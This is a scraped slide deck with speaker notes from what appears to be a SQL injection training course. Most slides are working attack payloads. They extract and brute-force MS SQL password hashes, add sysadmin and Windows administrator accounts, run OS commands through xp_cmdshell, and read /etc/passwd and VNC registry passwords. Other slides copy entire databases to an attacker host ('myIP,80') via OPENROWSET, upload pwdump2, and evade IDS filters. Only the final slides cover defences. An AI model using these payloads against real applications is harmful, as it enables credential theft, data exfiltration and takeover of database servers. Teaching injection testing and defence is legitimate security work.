  • 29. SELECT StatementSELECT Statement • Most injections will land in the middle of a SELECT statement • In a SELECT clause we almost always end up in the WHERE section: o SELECT * • FROM table • WHERE x = 'normalinput' group by x having 1=1 -- • GROUP BY x • HAVING x = y • ORDER BY x
  • 30. UPDATE statementUPDATE statement • In a change your password section of an app we may find the following o UPDATE users SET password = 'new password' WHERE login = logged.user AND password = 'old password' o If you inject in new password and comment the rest, you end up changing every password in the table!
  • 31. Determining a SELECTDetermining a SELECT Query StructureQuery Structure 1. Try to replicate an error free navigation  Could be as simple as ' and '1' = '1  Or ' and '1' = '2 1. Generate specific errors  Determine table and column names ' group by columnnames having 1=1 --  Do we need parenthesis? Is it a subquery?
  • 32. Is it a stored procedure?Is it a stored procedure? • We use different injections to determine what we can or cannot do o ,@variable o ?Param1=foo&Param2=bar o PRINT o PRINT @@variable
  • 33. Tricky QueriesTricky Queries • When we are in a part of a subquery or begin - end statement o We will need to use parenthesis to get out o Some functionality is not available in subqueries (for example group by, having and further subqueries) o In some occasions we will need to add an END • When several queries use the input o We may end up creating different errors in different queries, it gets confusing! • An error generated in the query we are interrupting may stop execution of our batch queries • Some queries are simply not escapable!
  • 34. c) Determine Databasec) Determine Database Engine TypeEngine Type • Most times the error messages will let us know what DB engine we are working with o ODBC errors will display database type as part of the driver information • If we have no ODBC error messages: o We make an educated guess based on the Operating System and Web Server o Or we use DB-specific characters, commands or stored procedures that will generate different error messages
  • 35. Some differencesSome differences MS SQL T-SQL MySQL Access Oracle PL/SQL DB2 Postgres PL/pgSQL Concatenate Strings ' '+' ' concat (" ", " ") " "&" " ' '||' ' " "+" " ' '||' ' Null replace Isnull() Ifnull() Iff(Isnull()) Ifnull() Ifnull() COALESCE() Position CHARINDEX LOCATE() InStr() InStr() InStr() TEXTPOS() Op Sys interaction xp_cmdshell select into outfile / dumpfile #date# utf_file import from export to Call Cast Yes No No No Yes Yes
  • 36. MoreMore differencesdifferences…… MS SQL MySQL Access Oracle DB2 Postgres UNION Y Y Y Y Y Y Subselects Y N 4.0 Y 4.1 N Y Y Y Batch Queries Y N* N N N Y Default stored procedures Many N N Many N N Linking DBs Y Y N Y Y N
  • 37. d) Finding out userd) Finding out user privilege levelprivilege level • There are several SQL99 built-in scalar functions that will work in most SQL implementations: o user or current_user o session_user o system_user • ' and 1 in (select user ) -- • '; if user ='dbo' waitfor delay '0:0:5 '-- • ' union select if( user() like 'root@%', benchmark(50000,sha1('test')), 'false' );
  • 38. DB AdministratorsDB Administrators • Default administrator accounts include: o sa, system, sys, dba, admin, root and many others • In MS SQL they map into dbo: o The dbo is a user that has implied permissions to perform all activities in the database. o Any member of the sysadmin fixed server role who uses a database is mapped to the special user inside each database called dbo. o Also, any object created by any member of the sysadmin fixed server role belongs to dbo automatically.
  • 39. 3) 1=1 Attacks3) 1=1 Attacks 1) Input Validation 5) OS Interaction 6) OS Cmd Prompt4) Extracting Data 7) Expand Influence 2) Info. Gathering 3) 1=1 Attacks
  • 40. Discover DB structureDiscover DB structure • Determine table and column names ' group by columnnames having 1=1 -- • Discover column name types ' union select sum(columnname ) from tablename -- • Enumerate user defined tables ' and 1 in (select min(name) from sysobjects where xtype = 'U' and name > '.') --
  • 41. Enumerating tableEnumerating table columns in different DBscolumns in different DBs • MS SQL o SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = 'tablename ') o sp_columns tablename (this stored procedure can be used instead) • MySQL o show columns from tablename • Oracle o SELECT * FROM all_tab_columns WHERE table_name='tablename ' • DB2 o SELECT * FROM syscat.columns WHERE tabname= 'tablename ' • Postgres o SELECT attnum,attname from pg_class, pg_attribute WHERE relname= 'tablename ' AND pg_class.oid=attrelid AND attnum > 0
  • 42. All tables and columns inAll tables and columns in one queryone query • ' union select 0, sysobjects.name + ': ' + syscolumns.name + ': ' + systypes.name, 1, 1, '1', 1, 1, 1, 1, 1 from sysobjects, syscolumns, systypes where sysobjects.xtype = 'U' AND sysobjects.id = syscolumns.id AND syscolumns.xtype = systypes.xtype --
  • 43. Database EnumerationDatabase Enumeration • In MS SQL Server, the databases can be queried with master..sysdatabases o Different databases in Server • ' and 1 in (select min(name ) from master.dbo.sysdatabases where name >'.' ) -- o File location of databases • ' and 1 in (select min(filename ) from master.dbo.sysdatabases where filename >'.' ) --
  • 44. System TablesSystem Tables • Oracle o SYS.USER_OBJECTS o SYS.TAB o SYS.USER_TEBLES o SYS.USER_VIEWS o SYS.ALL_TABLES o SYS.USER_TAB_COLUMNS o SYS.USER_CATALOG • MySQL o mysql.user o mysql.host o mysql.db • MS Access o MsysACEs o MsysObjects o MsysQueries o MsysRelationships • MS SQL Server o sysobjects o syscolumns o systypes o sysdatabases
  • 45. 4) Extracting Data4) Extracting Data 4) Extracting Data 1) Input Validation 5) OS Interaction 6) OS Cmd Prompt 7) Expand Influence 2) Info. Gathering 3) 1=1 Attacks
  • 46. Password grabbingPassword grabbing • Grabbing username and passwords from a User Defined table o '; begin declare @var varchar(8000) set @var=':' select @var=@var+' '+login+'/'+password+' ' from users where login>@var select @var as var into temp end -- o ' and 1 in (select var from temp) -- o ' ; drop table temp --
  • 47. Create DB AccountsCreate DB Accounts MS SQL o exec sp_addlogin 'victor', 'Pass123' o exec sp_addsrvrolemember 'victor', 'sysadmin' MySQL o INSERT INTO mysql.user (user, host, password) VALUES ('victor', 'localhost', PASSWORD('Pass123')) Access o CREATE USER victor IDENTIFIED BY 'Pass123' Postgres (requires UNIX account) o CREATE USER victor WITH PASSWORD 'Pass123' Oracle o CREATE USER victor IDENTIFIED BY Pass123 TEMPORARY TABLESPACE temp DEFAULT TABLESPACE users; o GRANT CONNECT TO victor; o GRANT RESOURCE TO victor;
  • 48. Grabbing MS SQL ServerGrabbing MS SQL Server HashesHashes • An easy query: o SELECT name, password FROM sysxlogins • But, hashes are varbinary o To display them correctly through an error message we need to Hex them o And then concatenate all o We can only fit 70 name/password pairs in a varchar o We can only see 1 complete pair at a time • Password field requires dbo access o With lower privileges we can still recover user names and brute force the password
  • 49. What do we do?What do we do? • The hashes are extracted using o SELECT password FROM master..sysxlogins • We then hex each hash begin @charvalue='0x', @i=1, @length=datalength(@binvalue), @hexstring = '0123456789ABCDEF' while (@i<=@length) BEGIN declare @tempint int, @firstint int, @secondint int select @tempint=CONVERT(int,SUBSTRING(@binvalue,@i,1)) select @firstint=FLOOR(@tempint/16) select @secondint=@tempint - (@firstint*16) select @charvalue=@charvalue + SUBSTRING (@hexstring,@firstint+1,1) + SUBSTRING (@hexstring, @secondint+1, 1) select @i=@i+1 END • And then we just cycle through all passwords
  • 50. Extracting SQL HashesExtracting SQL Hashes • It is a long statement '; begin declare @var varchar(8000), @xdate1 datetime, @binvalue varbinary(255), @charvalue varchar(255), @i int, @length int, @hexstring char(16) set @var=':' select @xdate1=(select min(xdate1) from master.dbo.sysxlogins where password is not null) begin while @xdate1 <= (select max(xdate1) from master.dbo.sysxlogins where password is not null) begin select @binvalue=(select password from master.dbo.sysxlogins where xdate1=@xdate1), @charvalue = '0x', @i=1, @length=datalength(@binvalue), @hexstring = '0123456789ABCDEF' while (@i<=@length) begin declare @tempint int, @firstint int, @secondint int select @tempint=CONVERT(int, SUBSTRING(@binvalue,@i,1)) select @firstint=FLOOR(@tempint/16) select @secondint=@tempint - (@firstint*16) select @charvalue=@charvalue + SUBSTRING (@hexstring,@firstint+1,1) + SUBSTRING (@hexstring, @secondint+1, 1) select @i=@i+1 end select @var=@var+' | '+name+'/'+@charvalue from master.dbo.sysxlogins where xdate1=@xdate1 select @xdate1 = (select isnull(min(xdate1),getdate()) from master..sysxlogins where xdate1>@xdate1 and password is not null) end select @var as x into temp end end --
  • 51. Extract hashes through error messagesExtract hashes through error messages • ' and 1 in (select x from temp) -- • ' and 1 in (select substring (x, 256, 256) from temp) -- • ' and 1 in (select substring (x, 512, 256) from temp) -- • etc… • ' drop table temp --
  • 52. Brute forcing PasswordsBrute forcing Passwords • Passwords can be brute forced by using the attacked server to do the processing • SQL Crack Script o create table tempdb..passwords( pwd varchar(255) ) o bulk insert tempdb..passwords from 'c:temppasswords.txt' o select name, pwd from tempdb..passwords inner join sysxlogins on (pwdcompare( pwd, sysxlogins.password, 0 ) = 1) union select name, name from sysxlogins where (pwdcompare( name, sysxlogins.password, 0 ) = 1) union select sysxlogins.name, null from sysxlogins join syslogins on sysxlogins.sid=syslogins.sid where sysxlogins.password is null and syslogins.isntgroup=0 and syslogins.isntuser=0 o drop table tempdb..passwords
  • 53. Transfer DB structure andTransfer DB structure and datadata • Once network connectivity has been tested • SQL Server can be linked back to the attacker's DB by using OPENROWSET • DB Structure is replicated • Data is transferred • It can all be done by connecting to a remote port 80!
  • 54. Create Identical DBCreate Identical DB StructureStructure '; insert into OPENROWSET('SQLoledb', 'uid=sa;pwd=Pass123;Network=DBMSSOCN;Address=myIP,80;', 'select * from mydatabase..hacked_sysdatabases') select * from master.dbo.sysdatabases -- '; insert into OPENROWSET('SQLoledb', 'uid=sa;pwd=Pass123;Network=DBMSSOCN;Address=myIP,80;', 'select * from mydatabase..hacked_sysdatabases') select * from user_database.dbo.sysobjects -- '; insert into OPENROWSET('SQLoledb', 'uid=sa;pwd=Pass123;Network=DBMSSOCN;Address=myIP,80;', 'select * from mydatabase..hacked_syscolumns') select * from user_database.dbo.syscolumns --
  • 55. Transfer DBTransfer DB '; insert into OPENROWSET('SQLoledb', 'uid=sa;pwd=Pass123;Network=DBMSSOCN;Address=myIP,80;', 'select * from mydatabase..table1') select * from database..table1 -- '; insert into OPENROWSET('SQLoledb', 'uid=sa;pwd=Pass123;Network=DBMSSOCN;Address=myIP,80;', 'select * from mydatabase..table2') select * from database..table2 --
  • 56. 5) OS Interaction5) OS Interaction 5) OS Interaction 6) OS Cmd Prompt 7) Expand Influence 1) Input Validation 2) Info. Gathering 3) 1=1 Attacks 4) Extracting Data
  • 57. Interacting with the OSInteracting with the OS • Two ways to interact with the OS: 1. Reading and writing system files from disk • Find passwords and configuration files • Change passwords and configuration • Execute commands by overwriting initialization or configuration files 1. Direct command execution • We can do anything • Both are restricted by the database's running privileges and permissions
  • 58. MySQL OS InteractionMySQL OS Interaction • MySQL o LOAD_FILE • ' union select 1,load_file('/etc/passwd'),1,1,1; o LOAD DATA INFILE • create table temp( line blob ); • load data infile '/etc/passwd' into table temp; • select * from temp; o SELECT INTO OUTFILE
  • 59. MS SQL OS InteractionMS SQL OS Interaction • MS SQL Server o '; exec master..xp_cmdshell 'ipconfig > test.txt' -- o '; CREATE TABLE tmp (txt varchar(8000)); BULK INSERT tmp FROM 'test.txt' -- o '; begin declare @data varchar(8000) ; set @data='| ' ; select @data=@data+txt+' | ' from tmp where txt<@data ; select @data as x into temp end -- o ' and 1 in (select substring(x,1,256) from temp) -- o '; declare @var sysname; set @var = 'del test.txt'; EXEC master..xp_cmdshell @var; drop table temp; drop table tmp --
  • 60. ArchitectureArchitecture • To keep in mind always! • Our injection most times will be executed on a different server • The DB server may not even have Internet access Web Server Web Page Access Database Server Injected SQL Execution! Application Server Input Validation Flaw
  • 61. Assessing NetworkAssessing Network ConnectivityConnectivity • Server name and configuration o ' and 1 in (select @@servername ) -- o ' and 1 in (select srvname from master..sysservers ) -- o NetBIOS, ARP, Local Open Ports, Trace route? • Reverse connections o nslookup, ping o ftp, tftp, smb • We have to test for firewall and proxies
  • 62. Gathering IP informationGathering IP information through reverse lookupsthrough reverse lookups • Reverse DNS o '; exec master..xp_cmdshell 'nslookup a.com MyIP' -- • Reverse Pings o '; exec master..xp_cmdshell 'ping MyIP' -- • OPENROWSET o '; select * from OPENROWSET( 'SQLoledb', 'uid=sa; pwd=Pass123; Network=DBMSSOCN; Address=MyIP,80;', 'select * from table')
  • 63. Network ReconnaissanceNetwork Reconnaissance • Using the xp_cmdshell all the following can be executed: o Ipconfig /all o Tracert myIP o arp -a o nbtstat -c o netstat -ano o route print
  • 64. Network ReconnaissanceNetwork Reconnaissance Full QueryFull Query • '; declare @var varchar(256); set @var = ' del test.txt && arp -a >> test.txt && ipconfig /all >> test.txt && nbtstat -c >> test.txt && netstat -ano >> test.txt && route print >> test.txt && tracert -w 10 -h 10 google.com >> test.txt'; EXEC master..xp_cmdshell @var -- • '; CREATE TABLE tmp (txt varchar(8000)); BULK INSERT tmp FROM 'test.txt' -- • '; begin declare @data varchar(8000) ; set @data=': ' ; select @data=@data+txt+' | ' from tmp where txt<@data ; select @data as x into temp end -- • ' and 1 in (select substring(x,1,255) from temp) -- • '; declare @var sysname; set @var = 'del test.txt'; EXEC master..xp_cmdshell @var; drop table temp; drop table tmp --
  • 65. 6) OS Cmd Prompt6) OS Cmd Prompt 7) Expand Influence 3) 1=1 Attacks 4) Extracting Data 1) Input Validation 2) Info. Gathering 5) OS Interaction 6) OS Cmd Prompt
  • 66. Jumping to the OSJumping to the OS • Linux based MySQL o ' union select 1, (load_file('/etc/passwd')),1,1,1; • MS SQL Windows Password Creation o '; exec xp_cmdshell 'net user /add victor Pass123'-- o '; exec xp_cmdshell 'net localgroup /add administrators victor' -- • Starting Services o '; exec master..xp_servicecontrol 'start','FTP Publishing' --
  • 67. Using ActiveXUsing ActiveX Automation ScriptsAutomation Scripts Speech example o '; declare @o int, @var int exec sp_oacreate 'speech.voicetext', @o out exec sp_oamethod @o, 'register', NULL, 'x', 'x' exec sp_oasetproperty @o, 'speed', 150 exec sp_oamethod @o, 'speak', NULL, 'warning, your sequel server has been hacked!', 1 waitfor delay '00:00:03' --
  • 68. Retrieving VNCRetrieving VNC Password from RegistryPassword from Registry • '; declare @out binary(8) exec master..xp_regread @rootkey='HKEY_LOCAL_MACHINE', @key='SOFTWAREORLWinVNC3Default', @value_name='Password', @value = @out output select cast(@out as bigint) as x into TEMP-- • ' and 1 in (select cast(x as varchar) from temp) --
  • 69. 7) Expand Influence7) Expand Influence 7) Expand Influence 3) 1=1 Attacks 4) Extracting Data 1) Input Validation 2) Info. Gathering 5) OS Interaction 6) OS Cmd Prompt
  • 70. Hopping into other DBHopping into other DB ServersServers • Finding linked servers in MS SQL o select * from sysservers • Using the OPENROWSET command hopping to those servers can easily be achieved • The same strategy we saw earlier with using OPENROWSET for reverse connections
  • 71. Linked ServersLinked Servers '; insert into OPENROWSET('SQLoledb', 'uid=sa;pwd=Pass123;Network=DBMSSOCN;Address=myIP,80;', 'select * from mydatabase..hacked_sysservers') select * from master.dbo.sysservers '; insert into OPENROWSET('SQLoledb', 'uid=sa;pwd=Pass123;Network=DBMSSOCN;Address=myIP,80;', 'select * from mydatabase..hacked_linked_sysservers') select * from LinkedServer.master.dbo.sysservers '; insert into OPENROWSET('SQLoledb', 'uid=sa;pwd=Pass123;Network=DBMSSOCN;Address=myIP,80;', 'select * from mydatabase..hacked_linked_sysdatabases') select * from LinkedServer.master.dbo.sysdatabases
  • 72. Executing through storedExecuting through stored procedures remotelyprocedures remotely • If the remote server is configured to only allow stored procedure execution, this changes would be made: insert into OPENROWSET('SQLoledb', 'uid=sa; pwd=Pass123; Network=DBMSSOCN; Address=myIP,80;', 'select * from mydatabase..hacked_sysservers') exec Linked_Server.master.dbo.sp_executesql N'select * from master.dbo.sysservers' insert into OPENROWSET('SQLoledb', 'uid=sa; pwd=Pass123; Network=DBMSSOCN; Address=myIP,80;', 'select * from mydatabase..hacked_sysdatabases') exec Linked_Server.master.dbo.sp_executesql N'select * from master.dbo.sysdatabases'
  • 73. Uploading files throughUploading files through reverse connectionreverse connection • '; create table AttackerTable (data text) -- • '; bulk insert AttackerTable -- from 'pwdump2.exe' with (codepage='RAW') • '; exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWAREMicrosoftMSSQLServ erClientConnectTo',' MySrvAlias','REG_SZ','DBMSSOCN, MyIP, 80' -- • '; exec xp_cmdshell 'bcp "select * from AttackerTable" queryout pwdump2.exe -c -Craw -SMySrvAlias -Uvictor -PPass123' --
  • 74. Uploading files throughUploading files through SQL InjectionSQL Injection • If the database server has no Internet connectivity, files can still be uploaded • Similar process but the files have to be hexed and sent as part of a query string • Files have to be broken up into smaller pieces (4,000 bytes per piece)
  • 75. Example of SQL injectionExample of SQL injection file uploadingfile uploading • The whole set of queries is lengthy • You first need to inject a stored procedure to convert hex to binary remotely • You then need to inject the binary as hex in 4000 byte chunks o ' declare @hex varchar(8000), @bin varchar(8000) select @hex = '4d5a900003000…  8000 hex chars …0000000000000000000' exec master..sp_hex2bin @hex, @bin output ; insert master..pwdump2 select @bin -- • Finally you concatenate the binaries and dump the file to disk.
  • 76. Evasion TechniquesEvasion Techniques • Input validation circumvention and IDS Evasion techniques are very similar • Snort based detection of SQL Injection is partially possible but relies on "signatures" • Signatures can be evaded easily • Input validation, IDS detection AND strong database and OS hardening must be used together
  • 77. IDS Signature EvasionIDS Signature Evasion Evading ' OR 1=1 signature • ' OR 'unusual' = 'unusual' • ' OR 'something' = 'some'+'thing' • ' OR 'text' = N'text' • ' OR 'something' like 'some%' • ' OR 2 > 1 • ' OR 'text' > 't' • ' OR 'whatever' IN ('whatever') • ' OR 2 BETWEEN 1 AND 3
  • 78. Input validationInput validation • Some people use PHP addslashes() function to escape characters o single quote (') o double quote (") o backslash () o NUL (the NULL byte) • This can be easily evaded by using replacements for any of the previous characters in a numeric field
  • 79. Evasion andEvasion and CircumventionCircumvention • IDS and input validation can be circumvented by encoding • Some ways of encoding parameters o URL encoding o Unicode/UTF-8 o Hex enconding o char() function
  • 80. MySQL Input ValidationMySQL Input Validation Circumvention usingCircumvention using Char()Char() • Inject without quotes (string = "%"): o ' or username like char(37); • Inject without quotes (string = "root"): o ' union select * from users where login = char(114,111,111,116); • Load files in unions (string = "/etc/passwd"): o ' union select 1, (load_file(char(47,101,116,99,47,112,97,115,115,119,100))),1,1,1; • Check for existing files (string = "n.ext"): o ' and 1=( if( (load_file(char(110,46,101,120,116))<>char(39,39)),1,0));
  • 81. IDS Signature EvasionIDS Signature Evasion using white spacesusing white spaces • UNION SELECT signature is different to • UNION SELECT • Tab, carriage return, linefeed or several white spaces may be used • Dropping spaces might work even better o 'OR'1'='1' (with no spaces) is correctly interpreted by some of the friendlier SQL databases
  • 82. IDS Signature EvasionIDS Signature Evasion using commentsusing comments • Some IDS are not tricked by white spaces • Using comments is the best alternative o /* … */ is used in SQL99 to delimit multirow comments o UNION/**/SELECT/**/ o '/**/OR/**/1/**/=/**/1 o This also allows to spread the injection through multiple fields • USERNAME: ' or 1/* • PASSWORD: */ =1 --
  • 83. IDS Signature EvasionIDS Signature Evasion using string concatenationusing string concatenation • In MySQL it is possible to separate instructions with comments o UNI/**/ON SEL/**/ECT • Or you can concatenate text and use a DB specific instruction to execute o Oracle • '; EXECUTE IMMEDIATE 'SEL' || 'ECT US' || 'ER' o MS SQL • '; EXEC ('SEL' + 'ECT US' + 'ER')
  • 84. IDS and Input ValidationIDS and Input Validation Evasion using variablesEvasion using variables • Yet another evasion technique allows for the definition of variables o ; declare @x nvarchar(80); set @x = N'SEL' + N'ECT US' + N'ER'); o EXEC (@x) o EXEC SP_EXECUTESQL @x • Or even using a hex value o ; declare @x varchar(80); set @x = 0x73656c65637420404076657273696f6e; EXEC (@x) o This statement uses no single quotes (')
  • 85. SQL Injection DefenseSQL Injection Defense • It is quite simple: input validation • The real challenge is making best practices consistent through all your code o Enforce "strong design" in new applications o You should audit your existing websites and source code • Even if you have an air tight design, harden your servers
  • 86. Strong DesignStrong Design • Define an easy "secure" path to querying data o Use stored procedures for interacting with database o Call stored procedures through a parameterized API o Validate all input through generic routines o Use the principle of "least privilege" • Define several roles, one for each kind of query
  • 87. Input ValidationInput Validation • Define data types for each field o Implement stringent "allow only good" filters • If the input is supposed to be numeric, use a numeric variable in your script to store it o Reject bad input rather than attempting to escape or modify it o Implement stringent "known bad" filters • For example: reject "select", "insert", "update", "shutdown", "delete", "drop", "--", "'"
  • 88. Harden the ServerHarden the Server 1. Run DB as a low-privilege user account 2. Remove unused stored procedures and functionality or restrict access to administrators 3. Change permissions and remove "public" access to system objects 4. Audit password strength for all user accounts 5. Remove pre-authenticated linked servers 6. Remove unused network protocols 7. Firewall the server so that only trusted clients can connect to it (typically only: administrative network, web server and backup server)
  • 89. Detection and DissuasionDetection and Dissuasion • You may want to react to SQL injection attempts by: o Logging the attempts o Sending email alerts o Blocking the offending IP o Sending back intimidating error messages: • "WARNING: Improper use of this application has been detected. A possible attack was identified. Legal actions will be taken." • Check with your lawyers for proper wording • This should be coded into your validation scripts
  • 90. ThankThank You !!!You !!! For More Information click below link: Follow Us on: http:// vibranttechnologies.co.in/php-classes-in-mumbai.html

Notes de l'éditeur

  1. SQL stands for Structured Query Language. It is the and ANSI (American National Standards Institute) standard language for accessing and manipulating relational database systems. ANSI is a standards committee composed of database experts from industry, academia and software vendors. It has also been accepted as a standard by ISO (International Organization for Standardization). SQL is a standard open language without corporate ownership. The commercial acceptance of SQL was precipitated by the formation of SQL Standards committees by the ANSI and the ISO in 1986 and 1987. Two years later they published a specification known as SQL89. An improvement and expansion to the standard gave the world SQL92. We now have the third generation standard, SQL99 also known as SQL3. SQL is used to communicate with a database. The communicating parties are typically a &amp;quot;front end&amp;quot; which sends a SQL Statement across a connection to a &amp;quot;back end&amp;quot; that holds the data. SQL statements are used to perform tasks such as retrieve, create, update or delete data from a database. Some common relational database management systems that use SQL are: Oracle, MS SQL Server, MS Access, Ingres, DB2, Sybase, Informix, etc.
  2. Although most database systems use SQL, most of them also have their own additional proprietary extensions that are usually only used on their system. Most DBMS are designed to meet the SQL92 standard partially and have not implemented the advanced features. However, the standard SQL commands such as &amp;quot;Select&amp;quot;, &amp;quot;Insert&amp;quot;, &amp;quot;Update&amp;quot;, &amp;quot;Delete&amp;quot;, &amp;quot;Create&amp;quot;, and &amp;quot;Drop&amp;quot; can be used throughout all database with little changes. All of the core functions, such as adding, reading and modifying data, are the same.
  3. A relational database system contains one or more objects called tables. The data or information for the database are stored in these tables. Tables are uniquely identified by their names and are comprised of columns and rows. Columns contain the column name, data type, and any other attributes for the column. Rows contain the records or data for the columns. Here is a sample table called &amp;quot;users&amp;quot;. This is a user defined table that could be used for validating and managing application users. In this table, the first row called userID is specified as an integer. By being defined as an integer column the only type of data that can be stored in that column are numeric integers. UserID is also the Primary Key for the Table. A table usually has a column or combination of columns whose values uniquely identify each row in the table. This column (or columns) is called the Primary Key of the table and enforces the entity integrity of the table. There can be no duplicate values. The other four columns are varchar (variable character data). Any kind of strings can be stored in these columns. Character data consists of any combination of letters, symbols, and numeric characters. To note, the password field is not encrypted. This should be implemented at an application level. These passwords are not directly linked or related to the SQL database passwords or the Operating System passwords.
  4. The SELECT statement is used to query the database and retrieve selected data that match the criteria that you specify. The column LastName that follows the SELECT keyword determines which column will be returned in the results. You can select as many column names that you&amp;apos;d like, or you can use a &amp;quot;*&amp;quot; to select all columns. The table name users that follows the keyword FROM specifies the table that will be queried to retrieve the desired results. The WHERE clause (optional) specifies which data values or rows will be returned or displayed. Based on the criteria described after the keyword WHERE the select statement will only bring the LastName value for all rows where UserID = 1. And also because UserID is the Primary Key (and therefore cannot have duplicate values), the only result for this query is &amp;quot;Smith&amp;quot;.
  5. SQL has many capabilities, but the most common needs are to: Read existing data - SELECT statement Change existing data - UPDATE statement Create new records holding data - INSERT INTO statement Delete data - DELETE statement
  6. Data Definition Language (DDL) is used to define and manage all the objects in an SQL database. DDL statements are SQL statements that support the definition or declaration of database objects (for example, CREATE TABLE, DROP TABLE, and ALTER TABLE). SQL contains DDL commands that can be used either interactively, or within programming language source code, to define databases and their components. Some of the most commonly used DDL statements in SQL are: CREATE TABLE - creates a new database table ALTER TABLE - changes a database table structure DROP TABLE - deletes a table and all rows in the database table CREATE INDEX - creates an index (search key) DROP INDEX - deletes an index For each object class, there are usually CREATE, ALTER, and DROP statements, such as CREATE TRIGGER, ALTER TRIGGER, and DROP TRIGGER.
  7. A Relational Database Management System (RDBMS) is defined as a system whose users view data as a collection of tables related to each other through common data values. Data is stored in tables, and tables are composed of rows and columns. Tables of independent data can be linked (or related) to one another if they each have columns of data (called keys) that represent the same data value. E.F. Codd’s Twelve Principles of Relational Databases continue to be used to validate the “relational” characteristics of a database product. A database product that does not meet all of these rules is not fully relational. One important aspect of all relational databases is that Metadata is stored within the database. Codd&amp;apos;s rule #4 states: 4. Metadata (data about the database) must be stored in the database just as regular data is. Other important Codd&amp;apos;s rules that define the way SQL Injection is done: 5. A single language must be able to define data, views, integrity constraints, authorization, transactions, and data manipulation. 10. Integrity constraints must be available and stored in the RDB metadata, not in an application program.
  8. SQL injection is a type of security exploit in which the attacker adds SQL statements through a web application&amp;apos;s input fields or hidden parameters to gain access to resources or make changes to data. It&amp;apos;s a serious vulnerability, which can lead to a high level of compromise - usually the ability to run any database query. It is an attack on web-based applications that connect to database back-ends in which the attacker executes unauthorized (and unexpected) SQL commands by taking advantage of insecure code and bad input validation. It is very often done on systems connected to the Internet because it allows to completely bypass the firewall. SQL injection attacks can be used to steal information from a database from which the data would normally not be available and to gain access to host computers through the database engine.
  9. Web-based applications constitute the worst threat of SQL injection. In our Pen Tests, over 60% of our clients continue to be vulnerable to SQL Injection. The main problem with SQL Injection is that the vulnerability is originated when the web application is coded. Most programmers are still not aware of the problem. Tutorials and demo &amp;quot;templates&amp;quot; on the Internet and even some that have been shipped with commercial databases promote building queries by concatenating strings, which is the main source for SQL Injection vulnerabilities. Additionally, a lot of the proposed solutions on the web continue to be flawed.
  10. Almost all SQL databases and programming languages are potentially vulnerable. It is an input validation problem that has to be considered and programmed by the web application developer.
  11. A common way of validating users in an application is to by checking if the user and password combination exists in the users table. The following query will bring back one record if there is one row where the login = &amp;apos;victor&amp;apos; and the password = &amp;apos;123&amp;apos;: SELECT * FROM users WHERE login = &amp;apos;victor&amp;apos; AND password = &amp;apos;123&amp;apos; To code this, a common practice among developers is to concatenate a string with the SQL command and then execute it to see if it returns something different to null. An Active Server Page code where the SQL statement gets concatenated might look like: var sql = &amp;quot;SELECT * FROM users WHERE login = &amp;apos;&amp;quot; + formusr + &amp;quot;&amp;apos; AND password = &amp;apos;&amp;quot; + formpwd + &amp;quot;&amp;apos;&amp;quot;;
  12. SQL Injection occurs when an attacker is able to insert a series of SQL statements into a &amp;apos;query&amp;apos; by manipulating data input. If an attacker inserts: &amp;apos; or 1=1 -- into the formusr field he will change the normal execution of the query. By inserting a single quote the username string is closed and the final concatenated string would end up interpreting or 1=1 as part of the command. The -- (double dash) is used to comment everything after the or 1=1 and avoid a wrong syntax error. This could also have been achieved by inserting the following command: &amp;apos; or &amp;apos;1&amp;apos;=&amp;apos;1 By injecting any of the two commands discussed, an attacker would get logged in as the first user in the table. This happens because the WHERE clause ends up validating that the username = &amp;apos; &amp;apos; (nothing) OR 1=1 (OR &amp;apos;1&amp;apos;=&amp;apos;1&amp;apos; in the second statement) The first conditional is False but the second one is True. By using OR the whole condition is True and therefore all rows from table users are returned. All rows is not null therefore the log in condition is met.
  13. The single quote character closes the string field and therefore allows all of the following text to be interpreted as SQL commands. To prevent this, a lot of the SQL Injection quick solutions found on the Internet suggest escaping the single quote with a double quote (that is the standard way of escaping single quotes in SQL99). This is only a half remedy though because there are always numeric fields or dates within forms or parameters that will remain vulnerable.
  14. With a similar syntax a numeric login would not use single quotes because in SQL you only need quotes for strings. This PHP / MySQL code example concatenates a query that uses no single quotes as part of the syntaxis.
  15. Injecting into a numeric field is very similar. The main difference with string injection is that in numeric injection the first number is taken as the complete parameter (no need to close it with a single quote) and all the text after that number will be considered as part of the command. In this case the # (number sign) is used instead of the -- (double dash) because we are injecting into a MySQL database.
  16. Symbol Usage in SQL99 complaint DBs + Addition operator; also concatenation operator; when used in an URL it becomes a white space) || Concatenation operator in Oracle and Postgres - Subtraction operator; also a range indicator in CHECK constraints = Equality operator &amp;lt;&amp;gt; != Inequality operators &amp;gt;&amp;lt; Greater-than and Less-than operators ( ) Expression or hierarchy delimiter % Wildcard attribute indicator , List item separator @, @@ Local and Global variable indicators . Identifier qualifier separator ‘’ “” Character string indicators “” Quoted identifier indicators -- Single-line comment delimiter # Single-line comment delimiter in MySQL or date delimiter in MS Access /*…*/ Begin and End multiline comment delimiter
  17. Depending on your objective the general methodology may vary. For Pen Testing purposes we have defined some comprehensive steps for testing applications.
  18. We have based our methodology on the OWASP Testing Framework. The Open Web Application Security Project (OWASP) is a volunteer project dedicated to sharing knowledge and developing open source software that promotes a better understanding of web application security. The OWASP Testing Project has been in development for over two years. It helps understand the what, why, when, where, and how of testing web applications, and not just provide a simple checklist or prescription of issues that should be addressed. OWASP has built a testing framework from which we have expanded to build our own testing program. In our Detailed Structured Analysis each step is analyzed, and all the tangents and sub-tangents are followed (attack-trees). Above we have included our SQL Injection analysis attack tree.
  19. The first step is to find a vulnerable entry in the web application.
  20. To find vulnerabilities all parameters in a web form must be checked. SQL Injection can happen in any of the following: Fields in Web Forms Script Parameters in Query Strings sent as part of the URL Values stored in cookies that are sent back to the web application Values sent in hidden fields To find all the different entry points in a web application a web proxy or a fuzzer must be used. With a fuzzer we insert different types of input into each entry point. &amp;quot;Fuzzing&amp;quot; is an automated software testing technique that generates and submits random or sequential data to various entry points of an application in an attempt to uncover security vulnerabilities. We use this technique to send specific string combinations with SQL specific reserved characters and words. We are looking for an application error or changes in the applications behavior or responses due to the insertion of one or several strings. For example, the delay query will make the application respond after 10 seconds if it is vulnerable and executing our command (in this case it would also have to be a MS SQL Server).
  21. Once a vulnerable entry has been detected. The next step is to gather as much information as possible about the underlying application.
